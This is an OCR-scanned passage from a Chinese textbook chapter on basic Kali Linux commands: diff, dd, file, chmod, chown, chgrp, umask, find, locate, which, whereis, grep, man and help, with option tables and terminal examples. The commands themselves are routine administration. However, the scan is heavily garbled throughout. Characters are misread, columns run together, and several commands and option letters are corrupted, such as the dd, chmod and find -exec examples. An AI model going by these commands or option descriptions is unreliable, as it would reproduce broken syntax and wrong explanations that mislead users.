的 子 目 录 。 命令 语法 格式 如 下 : 


diff [选项 ] 文件 


命令 中 选项 的 参数 介绍 见 下 表 。 


选 项 
-< 行 数 > 
-a 或 --text di 他 
-b 或 --ignore-space-change 
-B 或 --ienore-blank-lines 
-C 
-C< 行 数 > 或 --context< 行 数 > 


-d 或 --minimal 


-D< 巨 集 名 称 > 或 ifdef< 巨 集 名 称 > 


-e 或 --ed 
-f 或 -forward-ed 


-HH 或 --speed-large-files 


-1< 字 符 或 字符 串 > 或 --ignore-matching- 


lines< 字 符 或 字符 串 > 

-1 或 --ienore-case 

-| 或 --paginate 

-0 或 --Tcs 

-N 或 -new-file 

Only in 目录 

了: 

-P 或 --unidirectional-new-file 
-qd 或 --brief 

-I 或 --Tecursive 

-S 或 --Teport-identical-files 


-S< 文 件 > 或 --starting-file< 文 件 > 


-t 或 --expand-tabs 


表 diff 命 令 参数 介绍 


含义 
指定 要 显示 多 少 行 的 文本 。 此 参数 必须 与 -c 或 -u 参 数 一 并 使 用 
预 设 只 会 逐 行 比较 文本 文件 
不 检查 空格 字符 的 不 同 
不 检查 空白 行 


显示 全 部 内 文 ， 并 标 出 不 同 之 处 

与 执行 “-c-< 行 数 >” 指 令 相 同 

使 用 不 同 的 演算 法 ， 以 较 小 的 单位 来 做 比较 

此 参数 的 输出 格式 可 用 于 前 置 处 理 器 巨 集 

此 参数 的 输出 格式 可 用 于 ed 的 script 文 件 

输出 的 格式 类 似 ed 的 script 文 件 ， 但 按照 原来 文件 的 顺序 来 显示 不 同 处 
比较 大 文件 时 ， 可 加 快速 度 


各 两 个 文件 在 某 几 行 有 所 不 同 ， 而 这 几 行 同时 都 包含 了 选项 中 指定 的 
字符 或 字符 串 ， 则 不 显示 这 两 个 文件 的 差异 


不 检查 大 小 写 的 不 同 

将 结果 交 由 pr 程序 来 分 页 

将 比较 结果 以 RCS 的 格式 来 显示 

在 比较 目录 时 ， 若 文件 A 仅 出 现在 某 个 目录 中 ， 预 设 会 显示 

文件 A 若 使 用 -N 参 数 ， 则 di 全 会 将 文件 A 与 一 个 空白 的 文件 比较 

车 比较 的 文件 为 C 语 言 的 程序 码 文 件 时 ， 显 示 差 异 所 在 的 函数 名 称 


与 -N 类 似 ， 但 只 有 当 第 二 个 目录 包含 了 一 个 第 一 个 目录 所 没有 的 文件 
时 ， 才 会 将 这 个 文件 与 空白 的 文件 做 比较 


仅 显 示 有 无 差异 ， 不 显示 详细 的 信息 
比较 子 目 录 中 的 文件 

铬 没有 发 现任 何 差 异 ， 仍 然 显示 信息 
在 比较 目录 时 ， 从 指定 的 文件 开始 比较 
在 输出 时 ， 将 tab 字 符 展开 
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选项 
-T 或 --initial-tab 


-U.-U< 列 数 > 或 --unified=< 列 数 > 


续 表 
含义 


在 每 行 前 面 加 上 tab 字 符 以 便 对 齐 
以 合并 的 方式 来 显示 文件 内 容 的 不 同 


-V 或 --version 显示 版 本 信息 
-W 或 --ignore-all-space 忽略 全 部 的 空格 字符 


-W< 宽 度 > 或 --width< 宽 度 > 


-x< 文 件 名 或 目录 > 或 --exclude< 文 件 名 或 
目录 > 


在 使 用 -y 参 数 时 ， 指 定 栏 宽 


不 比较 选项 中 所 指定 的 文件 或 目录 


可 以 将 文件 或 目录 类 型 存 成 文本 文件 ， 然 后 在 =< 文 件 > 中 指定 此 文本 


-X< 文 件 > 或 --exclude-ffom< 文 件 > 文件 


-y 或 --side-by-side 


--help 显示 帮助 


以 并 列 的 方式 显示 文件 的 异同 之 处 


在 使 用 -y 参 数 时 ， 寿 两 个 文件 茶 一 行内 容 相同 ， 则 仅 在 左 侧 的 栏 位 显示 


--left-column 和 
该 行内 容 


--suppress-common-lines 


例如 : 使 用 diff 只 比较 两 个 文件 是 否 存 
在 差异 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat a.txt 
hello linux 
Ql123456789 
root@kali:~/temp# cat b.txt 


hello linux 
9876543210 
root@kali:~/temp# diff --brief a.txt b .txt 
文件 a.txt 和 b.txt 不 同 


例如 : 使 用 diff 比 较 两 个 文件 并 打印 出 

不 同 部 分 ， 下 图 为 命令 执行 效果 。 
root@kali:~/temp# diff -c a.txt b.txt | 
**** 日。 七 X 坏 2018-11-01 05:28:29.521628618 -0400 
-- b.txt 2018-11-01 05:28:54.396922947 -0409 


灶 半 半 半 半 阔 半 半 半 半 阔 半 半 半 半 


水 来 阔 】，Z 六 闵 闵 闪 
hello linux 

! 0123456789 
~ 1 ,2 
hello Linux 

1! 9876543210 


5 二 中 读 取 数据 ， 根 据 指定 的 格式 来 转换 数 
““ 据 ， 再 输出 到 文件 、 设 备 或 标准 输出 。 命 
令 语法 格式 如 下 : 


dd [选项 ] 
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在 使 用 -y 参 数 时 ， 仅 显示 不 同 之 处 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 dd 命令 参数 介绍 
选 项 含义 
if-file | 从 fle 中 读 而 不 是 标准 输入 
写 到 file 里 去 而 不 是 标准 输出 。 除 非 指定 


of=file conv=notrunc， 否 则 dd 将 把 file 截 为 0 字 节 
(或 由 seek= 选 项 指定 的 大 小 )》 

一 次 读 和 写 bytes 字 节 。 这 将 履 盖 ibs 和 obs 

设 定 的 值 

Count 设置 要 复制 块 的 个 数 


例如 : 使 用 dd 命令 从 /dev/zero 设 备 文件 
中 取出 一 个 大 小 为 560MB 的 数据 块 ， 然 后 保 
存 成 名 为 560_file 的 文件 ， 下 图 为 执行 效果 。 


root@kali:~/Ttemp# dd it=/dev’zero 0f=560 file count=I bs=560M 
记录 了 1+6 的 读 入 
记录 了 1+6 的 写 出 
587202560 bytes (587 MB, 560 MiB) copied, 8.11638 s, 72.3 MB/S 


bs=bytes 


4.4.7 file 


在 Kali Linux 系 统 中 ， 由 于 文本 、 目 
录 、 设 备 等 所 有 这 些 一 切 都 统称 为 文件 ， 
单 凭 后缀 无 法 确定 具体 的 文件 类 型 ， 这 时 
便 可 以 使 用 file 命 令 来 查看 文件 类 型 。 命 令 
语法 格式 如 下 : 
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file [文件 名 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 file 命令 参数 介绍 


选 项 含 义 

-b 列 出 辨识 结果 时 ， 不 显示 文件 名 称 

-C 详细 显示 指令 执行 过 程 ， 便 于 排 错 或 分 析 程 序 执行 的 情形 

和 名称 文件 > 人 

人 文件 名 称 

-L 直接 显示 符号 连接 所 指向 的 文件 的 类 别 

-m< 文 件 1: 文件 2> 可 以 是 单个 文件 ， 也 可 以 是 用 冒号 分 开 的 多 个 文件 

-V 显示 版 本 信息 

加 尝试 去 解读 压缩 文件 的 内 容 

[文件 或 目录 .…] 要 确定 类 型 的 文件 列表 ， 多 个 文件 之 间 使 用 空格 分 开 ， 可 以 使 用 shell 通 配 符 匹配 多 个 文件 
例如 : 使 用 file 命 令 查 看 文件 类 型 ， 下 ”加 安全 ， 也 可 以 避免 很 多 误 操 作 。 

图 为 命令 执行 效果 。 


4.5.1 chmod 


root@kali:~/Test/2# ls Eth 
addr arpingl.sh arping2.sh scan.sh scapyl.py scapy2.py rt et 

kali:~/ / Tal .sh 。 。 Y N i A 
li li nt le prio ASCII text executable Kall Linux/Unix 的 文件 调用 权限 分 为 三 J 三 
Jete: directory 级 : 文件 拥有 者 、 群 组 、 其 他 。 利 用 chmod 


命令 可 以 修改 文件 的 权限 。 命 令 语法 格式 
4.5 权限 分 配 操作 命令 如 下 : 


chmod [{ugoa}{+-=}{rwx}] [文件 或 目录 ] 
Kali Linux 系 统 对 于 权限 的 分 配 是 非常 [mode=421 ] [文件 或 目录 ] 


严格 的 ， 通 过 不 同 权 限 分 配 来 达到 系统 分 命令 中 选项 的 参数 介绍 见 下 表 。 
级 管理 ， 这 样 做 的 目的 不 但 是 为 了 系统 更 


表 chmod 命 令 参 数 介绍 


= 含义 
u 表示 该 文件 的 拥有 者 
2 表示 与 该 文件 的 拥有 者 属于 同一 个 群体 (group) 者 
0 表示 其 他 以 外 的 人 
a 表示 这 三 者 皆 是 
表示 增加 权限 
- 表示 取消 权限 
和 表示 唯一 设 定 权限 
I 表示 可 读 取 
Ww 表示 可 写 入 
X 表示 可 执行 
~ 表示 只 有 当 该 文件 是 个 子 目 录 或 者 该 文件 已 经 被 设 定 过 为 可 执行 


hn 
LA 
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续 表 
选 项 含 义 

< 知 该 文件 权限 确实 已 经 更 改 ， 才 显示 其 更 改动 作 
f 各 该 文件 权限 无 法 被 更 改 也 不 要 显示 错误 信息 
-V 显示 权限 变更 的 详细 资料 
-R 对 目前 目录 下 的 所 有 文件 与 子 目 录 进 行 相同 的 权限 变更 (以 弟 回 的 方式 逐个 变更 ) 
--help 显示 辅助 说 明 
--version 显示 版 本 

4.5.2 chown 


Linux 中 权限 之 
读 | 写 | 执行 | 读 | 写 | 执 行 | 读 | 写 | 执行 


尽管 在 Kali Linux 系 统 中 一 切 都 是 文 
件 ， 但 是 每 个 文件 的 类 型 不 尽 相 同 ， 因 此 
Kali Linux 系 统 使 用 了 不 同 的 字符 来 加 以 区 
分 ， 常 见 的 字符 见 下 表 。 
表 常见 的 字符 


字 符 说 明 
- 普通 文件 
d 目录 文件 
] 链接 文件 
b 块 设备 文件 
c 字符 设备 文件 
Pp 管道 文件 


例如 : 使 用 chmod 命 令 修 改 文件 权限 ， 
使 文件 具有 可 执行 权限 ， 下 图 为 执行 效果 。 


Iroot@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4696 16 月 30 23:37 ， 
drwxr-xr-x 30 root root 4096 10 月 30 22:48 .. | 
-TWwxr-xr-x 1 root root 9 16 月 30 22:48 001 .tx 
root@kali:~/temp# chmod 755 001.txt 
Iroot@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4696 16 月 30 23:37 ， 
drwxr-xr-x 39 root root 4696 16 月 30 22:48 .,. 

9 _ 10 月 30 22:48 096] .tx1 


例如 : 使 用 chmod 命 令 修改 文件 权限 ， 

取消 可 执行 权限 ， 下 图 为 执行 效果 。 
root@kali:~/temp# chmod u-x 9091.txt 

root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4096 19 月 396 23:37 . 


drwxr-xr-x 30 root root 4096 16 月 30 22:48 .， 
-rw-r-Xxr-X 1 root root 8 _ 16 月 396 22:48 001 .tx 


-rwxr-xr-x 1 root root 
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Kali Linux/Unix 是 多 人 多 工 操作 系统 ， 
每 个 文件 都 有 所 有 者 ，chown 将 指定 文件 的 
所 有 者 为 指定 的 用 户 或 组 ， 用 户 可 以 是 用 
户 名 或 者 用 户 ID， 可 以 是 组 名 或 者 组 ID 。 
文件 是 以 空格 分 开 的 要 改变 权限 的 文件 列 
表 ， 文 持 通配符 。 

一 般 来 说 ， 这 个 指令 只 有 是 由 系统 管 
理 者 〈root) 所 使 用 ， 一 般 使 用 者 没有 权限 
可 以 改变 别人 的 文件 拥有 者 ， 也 没有 权限 
可 以 自己 的 文件 拥有 者 改 设 为 别人 。 只 有 
系统 管理 者 〈root) 才 有 这 样 的 权限 。 命 令 
语法 格式 如 下 : 


[用 户 ] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 trs 命 令 参 数 介绍 


chown 


选 项 含 义 
User 新 的 文件 拥有 者 的 使 用 者 ID 
group 新 的 文件 拥有 者 的 使 用 者 组 (group) 
-C 显示 更 改 的 部 分 的 信息 
-f 忽略 错误 信息 
-h 修复 符号 链接 
-V 显示 详细 的 处 理 信息 
处 理 指 定 目录 以 及 其 子 目 录 下 的 所 有 


rT 


chown 命 令 的 作用 是 修改 文件 的 所 有 
者 ， 例 如 : 修改 文件 test 001.txt 所 有 者 ， 使 
用 “chown test 001.txt” 命 令 ， 执 行 效果 如 
下 图 所 示 。 


root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4096 16 月 30 23:37 ， 
drwxr-xr-x 30 root root 4096 16 月 36 22:48 .. 
-rw-r-Xxr-X 1 root root 9 16 月 39 22:48 0961.txa 
root@kali:~/temp# chown test 691.txt 
root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4696 16 月 36 23:37 ， 
drwxr-xr-x 30 root root 4096 196 月 30 22:48 .. 
-rw-r-Xr-X 1 test root 9 _ 19 月 3906 22:48 001.tLXx 


4.5.3 chgrp 


Kali Linux 系 统 中 的 chgrp 命 令 用 于 变更 
文件 或 目录 的 所 属 群 组 。 在 UNIX 系 统 家 族 
里 ， 文 件 或 目录 权限 的 掌控 以 所 有 者 及 所 属 
群 组 来 管理 ， 用 户 可 以 使 用 chgrp 指 令 去 变 
更 文件 与 目录 的 所 属 群 组 ， 设 置 方 式 采 用 群 
组 名 称 或 群 组 JD。 命 令 语法 格式 如 下 : 


[用 户 组 ] [文件 或 目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”trs 命 令 参数 介绍 


Chgryp 


选 ”项 -EE 
-C 或 --changes 效果 类 似 “-v” 选 项 ， 但 仅 回 
报 更 改 的 部 分 
-{ 或 --quiet 或 --silent ”| 不 显示 错误 信息 
-h 或 -no-dereference 只 对 符号 连接 的 文件 做 修改 ， 
而 不 更 动 其 他 任何 相关 文件 


递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目 录 一 并 处 理 


-RR 长 --recursive 


-V 或 --verbose 显示 指令 执行 过 程 
--help 在 线 帮助 
把 指定 文件 或 目录 的 所 属 群 组 
a 二 < 参 
We 吉文 | 全 部 设 成 和 参考 文件 或 目录 的 
所 属 群 组 相同 
--Version 显示 版 本 信息 
chgrp 命 令 同 修改 文件 所 有 者 类 似 ， 
一 个 用 于 修改 用 户 ， 一 个 则 用 于 修改 所 属 
组 ， 例 如 : 使 用 chgrp 修 改 文 件 所 属 组 ， 下 
图 为 执行 效果 。 
root@kali:~/temp# ls -la 
总 用 量 8 


drwxr-xr-x 2 root root 4696 16 月 30 23:37 ， 

drwxr-xr-x 30 root root 4096 16 月 30 22:48 .. 
-TW-r-xr-x 1 test root 9 16 月 30 22:48 9601.ftXxt 

root@kali:~/temp# chgrp test 001.txt 

root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4096 16 月 30 23:37 . 

drwxr-xr-x 30 root root 4696 196 月 30 22:48 ， 
-TW-r-xXr-x 1 test test 0 16 月 30 22:48 001. txt 


悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


4.5.4 umask 


建立 文件 时 预 设 的 权限 扼 码 。 umask 可 用 
来 设 定 权 限 掩 码 。 权 限 掩 码 是 由 3 个 八进制 
和 eld lobe te 


限 。 Pi 令 二 es 
umask [-S] 


命令 中 选项 参数 -S$， 表 示 以 rwx 形 式 显 
示 新 建文 件 默 认 权 限 

例如 : 执行 umask 命 令 可 以 查看 默认 权 
限 ， 下 图 为 命令 执行 效果 。 
root@kali:~/temp# Umask 
0022 


root@kali:~/temp# umask -S 
U=rwX,g=rX ,oO=rx 


全 注意 : 默认 权限 的 计算 方式 为 drwxr- 
XIr-Xx=7//7-022=7135。 


4.6 ”文本 搜索 操作 命令 


随 看 操作 系统 的 使 用 时 间 加 长 ， 系 统 
中 会 存放 大 量 的 文件 信息 ， 如 何 快 速 定位 
到 某 个 文件 这 就 需要 使 用 文件 搜索 指令 。 


4.6.1 find 


Kali Linux 系 统 中 的 find 命 令 用 来 在 指定 音 
目录 下 查找 文件 ， 任 何 位 于 参数 之 前 的 字 
符 串 都 将 被 视 为 欲 查找 的 目录 名 。 如 果 使 
用 该 命令 时 ， 不 设置 任何 选项 ， 则 find 命 令 
将 在 当前 目录 下 查找 子 目录 与 文件 ， 并 且 将 


To 


上 六 


得 找到 的 子 目 录 和 文件 全 部 进行 显示 。 命 令 
语法 格式 如 下 : 

find path “Ontion [ rn 
[ -exec 一 DK command | 人 2 


d 命 令 根据 下 列 规则 判断 path 和 expres- 
sion, dp “-(),!” 之 前 的 部 
分 为 path， 之 后 的 是 expression。 如 果 path 是 
空 字 符 串 则 使 用 目前 路 径 ， 如 果 expression 
是 空 字符 串 则 使 用 -print 为 预 设 expression 。 
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表达 式 中 可 使 用 的 选项 有 二 三 十 个 之 多 ， 在 此 只 介绍 最 常用 的 部 分 ， 见 下 表 。 
表 表达 式 中 可 使 用 的 选项 


选 项 含 义 
-mount, -xdev 只 检查 和 指定 目录 在 同一 个 文件 系统 下 的 文件 ， 避 免 列 出 其 他 文件 系统 中 的 文件 
-amin n 在 过 去 n 分 钟 内 被 读 取 过 的 的 文件 
-anewer file 比 文件 file 更 晚 被 读 取 过 的 文件 
-atime n 在 过 去 n 天 内 被 读 取 过 的 文件 
-cmin n 在 过 去 n 分 钟 内 被 修改 过 的 文件 
-cnewer file 比 文件 file 更 新 的 文件 
-ctimen 在 过 去 n 天 内 被 修改 过 的 文件 
-empty 空 的 文件 


-gld n or -group name 
-1ipath p, -path p 


-name name. -iIname name 


-SlZe nN 


id 是 n 或 是 group 名 称 是 name 的 文件 

路 径 名 称 符合 p 的 文件 ，ipa 了 h 会 忽略 大 小 写 

文件 名 称 符合 name 的 文件 。iname 会 忽略 大 小 写 

文件 大 小 是 n 单 位 ，b 代 表 512 位 元 组 的 区 块 ，c 表 示 字 元 数 ，k 表 示 kKilo bytes，w 是 二 


搜索 指定 类 型 的 文件 ， 其 中 d 代 表 目 录 文件 ; c 代 表 字 符 设备 文件 ;b 代 表 快 设备 文 


个 位 元 组 
-type c 

络 通信 链接 的 文件 
-pidn 进程 id 是 2” 的 文件 


下 面 举 例 说 明 fnd 命 令 的 使 用 方法 : 

例如 : 使 用 find /etc -name init 命 
令 ， 在 目录 /etc 中 查找 文件 init， 下 图 为 命 
令 执 行 效果 ， 使 用 -iname 不 区 分 大 小 写 。 


root@kali:~/temp# find /etc -name init 
/etc/apparmor/init 
/etc/init 


例如 : 使 用 find / -size +204800 命 令 ， 
在 根 目 录 下 查找 大 于 100MB 的 文件 ， 下 图 
为 命令 执行 效果 ， 其 中 +n 大 于 、-n 小 于 、n 
等 于 。 
root@kali:~/temp# find / -size +204800 
/proc/kcore 
find: “/proc/1715/task/1715/fd/6': 没有 那个 文件 或 目录 
find: “/proc/1715/task/1715/fdinfo/6': 没有 那个 文件 或 目录 
find: “/proc/1715/fd/5': 没有 那个 文件 或 目录 
find: “/proc/1715/fdinfo/5’: 没有 那个 文件 或 目录 


/sys/devices/pci0000:00/0000:00:0f.0/resourcel 
/sys/devices/pci0000:00/0000:00:0f.0/resourcel wc 


例如 : 使 用 find /root/temp -user test 
命令 ， 在 /root/temp 目 录 下 查找 所 有 者 为 test 
的 文件 ， 下 图 为 命令 执行 效果 ，-group 根 据 
所 属 组 查找 。 
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件 ，p 代 表 管 道 文件 ，f 代 表 普 通 文件 ，1 代 表 符 号 链接 文件 ，s 代 表 socket 文 件 用 于 网 


root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4096 16 月 39 23:37 . 
drwxr-xr-x 30 root root 4096 10 月 30 22:48 .， 
-TW-r-xr-x 1 test test 9 16 月 30 22:48 60601 ,txt 
root@kali:~/temp# find /root/temp -user test 
/root/temp/001.txt 


例如 : 使 用 find / -cmin -5 命令 ， 在 根 
目录 下 查找 5 分 钟 内 被 修改 过 属性 的 文件 和 
目录 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# find / 
/proc/19077/task/1088/fd/34 
/proc/1717/task/1717/fd/6 
/proc/1717/task/1717/fdinfo/6 
/proc/1718 

/proc/1718/task 
/proc/1718/task/1718 
/proc/1718/task/1718/fd 


-CMinNn -5 


例如 : 使 用 fnd /etc -size +1024 -a -size 
-204800 命 令 ， 在 /etc 下 查找 大 于 0.5MB 小 于 
100MB 的 文件 ， 下 图 为 命令 执行 效果 。-a 两 
个 条 件 同时 满足 ; -o 两 个 条 件 满足 任意 一 个 
印 可 。 
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root@kali:~/temp# find /etc -size +1024 -a -size 
/etc/ssh/moduli 
/etc/netsniff-ng/oui.conf 
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例如 : 使 用 find /etc -name inittab -exec 
ls -] {} \ 命令 ， 在 /etc 下 查找 pam.d 目 录 中 
的 文件 并 显示 其 详细 信息 ， 下 图 为 命令 执 
行 效果 。 


root@kali:~/temp# Tind /etc -name pam.d -exec [5 -U {Ff \; 
总 用 量 149 


-rw-r--r-- 1 root root 384 3 月 27 26017 chfn 
-rw-r--r-- 
-= rw-rF--r-- 
-FwW-F--r-- 


r-- 1 root root 92 9 月 27 2017 chpasswd 
E 
r 
-rw-r--r-- 
r 
r 


1 root root 581 3 月 27 2617 chsh 

1 root root 1208 1l6 月 8 91:92 common-account 
1 root root 1221 16 月 8 601:02 common-auth 

1 root root 1486 16 月 8 061:602 common-password 
1 root root 1189 16 月 8 91:92 common-session 
1 _ root root 1154 16 月 8 601:92 common-session-noninteractive 


-rw-r--r-- 
-rw-r--r-- 
La T= 


4.6.2 locate 


Kali Linux 系 统 中 的 locate 命 令 用 于 查找 
符合 条 件 的 文档 ， 它 会 去 保存 文档 和 目录 
名 称 的 数据 库 内 ， 碍 找 符合 范本 样式 条 件 
的 文档 或 目录 ， 一 般 情 况 输入 locate your_ 
file name 即 可 查找 指定 文件 。 命 令 语 法 格 
式 如 下 : 


locate [-d ][--help] [--version] [范本 
各 式 2-5] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 locate 命 令 参 数 介 绍 


选 项 含 义 

配置 locate 指 令 使 用 的 数据 库 ， 默 
认 locate 指 令 预 设 的 数据 库 位 于 /var/ 

-d 或 --database= | lib/slocate 目 录 里 ， 文 档 名 为 slocate. 
db， 当 然 也 可 以 使 用 这 个 选项 男 行 
指定 

--help 在 线 帮助 

--Version 显示 版 本 信息 


(人 侈 提示 : locate 与 find 不 同 ，find 是 在 硬盘 中 
寻找 ，locate 只 在 /var/lib/slocate 资 料 库 中 寻 
找 。1locate 的 速度 比 find 快 ， 它 并 不 是 真 的 
查找 ， 而 是 查 数据 库 ， 一 般 文 件数 据 库 在 
/varlib/slocate/slocate.db 中 ， 所 以 locate 的 查 
找 并 不 是 实时 的 ， 而 是 以 数据 库 的 更 新 为 
准 ， 一 般 是 系统 自己 维护 ， 也 可 以 人 工 升 
级 数据 库 ， 命 令 为 locate -u。 
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例如 : 使 用 locate inittab 命 令 ， 查 找 init- 
tab 字 上 段 的 文件 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# Locate inittab 
/usr/share/terminfo/a/ansi+inittabs 
/usr/share/vim/vim81/syntax/inittab.vim 


4.6.3 which a 

Kali Linux 系 统 中 的 which 命 令 用 于 查 二 
找 文件 ，which 指 令 会 在 环境 变量 SPATH 
设置 的 目录 里 查找 符合 条 件 的 文件 。 命 令 
语法 格式 如 下 : 

re 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 trs 命 令 参 数 介 绍 


选 项 含 义 
指定 文件 名 长 度 ， 指 定 的 长 度 必 
-n< 文 件 名 长 度 > | 须 大 于 或 等 于 所 有 文件 中 最 长 的 
文件 名 
与 -n 参 数 相同 ， 但 此 处 的 < 文件 名 
了 < 文件 名 长 度 > | 长 度 > 包括 了 文件 的 路 径 
本 指定 输出 时 栏 位 的 宽度 
显示 版 本 信息 


例如 : 使 用 which 命 令 搜索 命令 所 在 
路 径 ， 执 行 which ls 命令 ， 下 图 为 命令 执行 
效果 。 


和 which ls 
usr/bin/ls 


4.6.4 whereils 


找 文件 。 该 指令 会 在 特定 目录 中 查找 符合 
条 件 的 文件 。 这 些 文件 应 属于 原始 代码 、 
二 进 制 文件 ， 或 是 帮助 文件 。 不 过 ， 该 指 
令 只 能 用 于 查找 二 进 制 文件 、 源 代码 文 
件 和 man 手 册页 ， 一 般 文件 的 定位 需 使 用 
locate 命 令 。 命 令 语法 格式 如 下 : 


whereis [-bfmsu] [-B < 目录 >...][-M < 目 
; SO 0 = 


命令 中 选项 的 参数 介绍 见 下 表 。 
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表 ”whereis 命 令 参数 介绍 4.6.5 grep 
合 X Kali Linux 系 统 中 的 grep 命 令 用 于 碍 
ee“ 找 文件 里 符合 条 件 的 字符 串 ， 其 查找 的 内 
只 在 设置 的 目录 下 查找 二 进 制 文件 0 

3 不 显示 文件 名 前 的 聊 径 名 称 容 包 含 指定 的 范本 样式 文件 ， 如 果 发 现 某 
a 只 查找 说 明文 件 文件 的 内 容 符 合 所 指定 的 范本 样式 ， 预 设 
-M< 目 录 > | 只 在 设置 的 目录 下 查找 说 明文 件 grep 指 令 会 把 含有 范本 样式 的 那 一 列 显示 出 
-5 只 查找 原始 代码 文件 来 。 硅 不 指定 任何 文件 名 称 ， 或 是 所 给 予 
-S< 目 录 > 只 在 设置 的 目录 下 查找 原始 代码 文件 的 文件 名 为 “-”， 则 grep 指 令 会 从 标准 输 

1 得 找 不 包 合 指 定 关 型 的 文件 入 设备 读 取 数据 。 命 令 语法 格式 如 下 : 
例如 : 使 用 whereis 命 令 搜索 命令 及 帮 grep [-abcEFGhHilLnaqrsVvVwxYy] [-A< 显 示 


大 h 1s 命 令 ， 列 数 >] [-B< 显 示 列 数 >] [-C< 显 示 列 数 >] [-d< 进 行动 
I WH le 作 >] [-e< 范 本 样式 >] as [--help][ 范 


图 为 命令 执行 效果 。 本 样式 ] [文件 或 目录 . . . 
root@kali:~/temp# whereis ls 

2 Ausr/bin/Ls /usr/share/man/manl/ls.1.gz 命令 中 选项 rp 下 表 。 

表 ”grep 命 令 参 数 介 绍 
选 项 含 义 

-a 或 --text 不 要 忽略 二 进 制 的 数据 
i 除了 显示 符合 范本 样式 的 那 一 列 之 外 ， 并 显示 该 行 之 后 的 内 容 
-b 或 --byte-offset 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 第 一 个 字符 的 编号 
-B< 显 示 行 数 > 或 --before- =< 显 

< 量 示 行 数 > 或 -before-context< 量 | 除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 的 内 容 
示 行 数 > 

-C 或 --count 计算 符合 样式 的 列 数 


-C< 显 示 行 数 > 或 --context=< 显 示 行 数 a 
ads 7 除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 后 的 内 容 
> 或 -< 显示 行 数 > 


4 三 | ~ 以 尹 ， 会 ， 
_d4 < 动作 > 或 _directorics-< 动 作 > 当 指 定 要 得 找 的 是 目录 而 非 文件 时 ， 必 须 使 用 这 项 参数 ， 否 则 grep 指 令 将 


回报 信息 并 停止 动作 
-e< 范 本 样式 > 或 --regexp 一 < 范本 样式 > | 指定 字符 串 作 为 查找 文件 内 容 的 样式 
-E 或 --extended-regexp 将 样式 为 延伸 的 普通 表示 法 来 使 用 


指定 规则 文件 ， 其 内 容 含有 一 个 或 多 个 规则 样式 ， 让 grep 僵 找 符合 规则 条 


- 口 Er 一 贝 
作 规 则 文件 > 或 -file=< 规 则 文件 > | 件 的 文件 内 容 ， 格 式 为 每 行 一 个 规则 样式 


-F 或 --fixed-regexp 将 样式 视 为 固定 字符 串 的 列表 

-G 或 --basic-regexp 将 样式 视 为 普通 的 表示 法 来 使 用 

-h 或 --no-filename 在 显示 符合 样式 的 那 一 行 之 前 ， 不 标示 该 行 所 属 的 文件 名 称 
-HH 或 --with-filename 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 该 行 所 属 的 文件 名 称 

-i 或 --ignore-case 忽略 字符 大 小 写 的 差别 

-1 或 --file-with-matches 列 出 文件 内 容 符 合 指 定 的 样式 的 文件 名 称 

-或 --files-without-match 列 出 文件 内 容 不 符合 指定 的 样式 的 文件 名 称 

-0 或 --line-number 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 的 列 数 编号 

-d 或 --quiet 或 --silent 不 显示 任何 信息 
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续 表 
选项 含 义 

-IT 或 --recursive 此 参数 的 效果 和 指定 “-d recurse” 人 参数 相同 

-Ss 或 --no-messages 不 显示 错误 信息 

-V 或 --revert-match 显示 不 包含 匹配 文本 的 所 有 行 

-V 或 --version 显示 版 本 信息 

-W 或 --word-regexp 只 显示 全 字符 合 的 列 

-X --line-regexp 只 显示 全 列 符 合 的 列 

-y 此 参数 的 效果 和 指定 “-i” 参 数 相 同 

例如 。 使 用 grep 命 令 筛选 出 符合 条 件 | 4.6.7 help gg 
Ps /二 - 人 Ee 

的 文本 内 容 ， 执 行 grep asp /etc/services 命 help 为 内 置 指令 帮助 命令 ， 多 数 指令 ME 


ds 都 提供 了 内 置 的 帮助 手册 ， 如 果 忘记 某 个 ”” 
7 4 和 re 指令 的 操作 方法 ， 可 以 使 用 help 查 看 帮助 信 
息 。 命 令 语法 如 下 : 
help 命令 和 ; 站 这 
例如 : 使 用 help umask 命 令 ， 查看 中 ee 
umask 的 帮助 信息 ， 下 图 为 命令 执行 效果 。 


4.6.6 man 

man 命 令 是 Kali Linux 系 统 中 的 帮助 指 
令 ， 通 过 man 指 令 可 以 查看 Kali Linux 中 的 
指令 帮助 、 配 置 文件 帮助 和 编程 帮助 等 信 


自 和 五 root@kali:~/Ttemp# help umasKk 
五 umask: umask [-p] [-S] [模式 ] 
心 \o 命令 语法 格式 如 下 : 显示 或 设 定 文件 模式 掩 码 。 
设 定 用 户 文 件 创建 掩 码 为 MODE 模式 。 如 果 省 略 了 MODE ， 则 
man [命令 或 配置 文件 ] 打印 当前 掩 码 的 值 。 
命令 中 选项 的 参数 介绍 见 下 表 。 如 果 NODE 模式 以 数字 开头 ， 则 被 当 作 八进制 数 解析 ; 否则 是 一 个 
chmod(1) 可 接收 的 符号 模式 串 。 
表 grep 命 令 参 数 介 绍 选项 : 
-p 如 果 省 略 MODE 模式 ， 以 可 重用 为 输入 的 格式 输入 
$ % 上 5 一 乡 ， 本 上 » s 
洗 项 会 x s 六 符号 形式 输出 ， 否 则 以 八进制 数 格式 输出 
退出 状态 : 
